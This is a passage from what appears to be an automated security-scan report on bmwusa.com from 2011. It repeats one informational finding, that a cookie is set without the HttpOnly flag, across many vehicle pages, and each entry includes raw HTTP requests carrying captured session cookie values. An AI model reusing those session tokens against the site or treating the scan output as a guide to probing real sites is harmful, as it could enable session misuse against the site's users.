Cookie: CHECK=XP9y6GTRm#@U; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; NSC_CNX_21529_64.29.204.16=4f52b42b3660; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349; ddretarg=1

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Location: http://www.bmwusa.com/favicon.ico
Content-Type: image/x-icon
ETag: "e42496de70abcb1:0"
Last-Modified: Mon, 03 Jan 2011 18:05:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Date: Fri, 21 Jan 2011 19:22:05 GMT
Connection: close
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 19:42:05 GMT;path=/
Content-Length: 894

..............h.......(....... ..................................................~{c_\b^Z..~..............................:85..................FEC......................................................
...[SNIP]...

10.157. http://www.bmwusa.com/jsenvconst.ashx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/jsenvconst.ashx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 19:41:51 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /jsenvconst.ashx HTTP/1.1
Host: www.bmwusa.com
Proxy-Connection: keep-alive
Referer: http://www.bmwusa.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CHECK=XP9y6GTRm#@U; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; NSC_CNX_21529_64.29.204.16=4f52b42b3660

Response

10.158. http://www.bmwusa.com/standard/content/vehicles/2011/1/128iconvertible/1seriesconvertiblemediagallery.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/1/128iconvertible/1seriesconvertiblemediagallery.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:03:52 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/1/128iconvertible/1seriesconvertiblemediagallery.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 19:43:52 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:03:52 GMT;path=/
Content-Length: 202165

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.159. http://www.bmwusa.com/standard/content/vehicles/2011/1/128iconvertible/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/1/128iconvertible/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:02:52 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/1/128iconvertible/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 19:42:52 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:02:52 GMT;path=/
Content-Length: 213572

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.160. http://www.bmwusa.com/standard/content/vehicles/2011/1/128iconvertible/features_and_specs/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/1/128iconvertible/features_and_specs/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:04:20 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/1/128iconvertible/features_and_specs/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 19:44:20 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:04:20 GMT;path=/
Content-Length: 225243

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.161. http://www.bmwusa.com/standard/content/vehicles/2011/1/128iconvertible/modelhighlights/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/1/128iconvertible/modelhighlights/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:03:02 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/1/128iconvertible/modelhighlights/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 19:43:02 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:03:02 GMT;path=/
Content-Length: 216182

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.162. http://www.bmwusa.com/standard/content/vehicles/2011/1/128icoupe/1seriescoupemediagallery.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/1/128icoupe/1seriescoupemediagallery.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:02:22 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/1/128icoupe/1seriescoupemediagallery.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 19:42:22 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:02:22 GMT;path=/
Content-Length: 201997

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.163. http://www.bmwusa.com/standard/content/vehicles/2011/1/128icoupe/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/1/128icoupe/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:02:21 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/1/128icoupe/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 19:42:21 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:02:21 GMT;path=/
Content-Length: 213283

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.164. http://www.bmwusa.com/standard/content/vehicles/2011/1/128icoupe/features_and_specs/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/1/128icoupe/features_and_specs/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:02:23 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/1/128icoupe/features_and_specs/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 19:42:23 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:02:23 GMT;path=/
Content-Length: 200122

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.165. http://www.bmwusa.com/standard/content/vehicles/2011/1/128icoupe/modelhighlights/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/1/128icoupe/modelhighlights/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:02:24 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/1/128icoupe/modelhighlights/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 19:42:24 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:02:24 GMT;path=/
Content-Length: 214638

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.166. http://www.bmwusa.com/standard/content/vehicles/2011/1/135iconvertible/1seriesconvertiblemediagallery.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/1/135iconvertible/1seriesconvertiblemediagallery.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:07:34 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/1/135iconvertible/1seriesconvertiblemediagallery.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 19:47:34 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:07:34 GMT;path=/
Content-Length: 202358

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.167. http://www.bmwusa.com/standard/content/vehicles/2011/1/135iconvertible/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/1/135iconvertible/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:06:27 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/1/135iconvertible/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 19:46:27 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:06:27 GMT;path=/
Content-Length: 213670

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.168. http://www.bmwusa.com/standard/content/vehicles/2011/1/135iconvertible/features_and_specs/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/1/135iconvertible/features_and_specs/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:07:37 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/1/135iconvertible/features_and_specs/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 19:47:37 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:07:37 GMT;path=/
Content-Length: 225504

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.169. http://www.bmwusa.com/standard/content/vehicles/2011/1/135iconvertible/modelhighlights/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/1/135iconvertible/modelhighlights/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:07:14 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/1/135iconvertible/modelhighlights/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 19:47:14 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:07:14 GMT;path=/
Content-Length: 216027

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

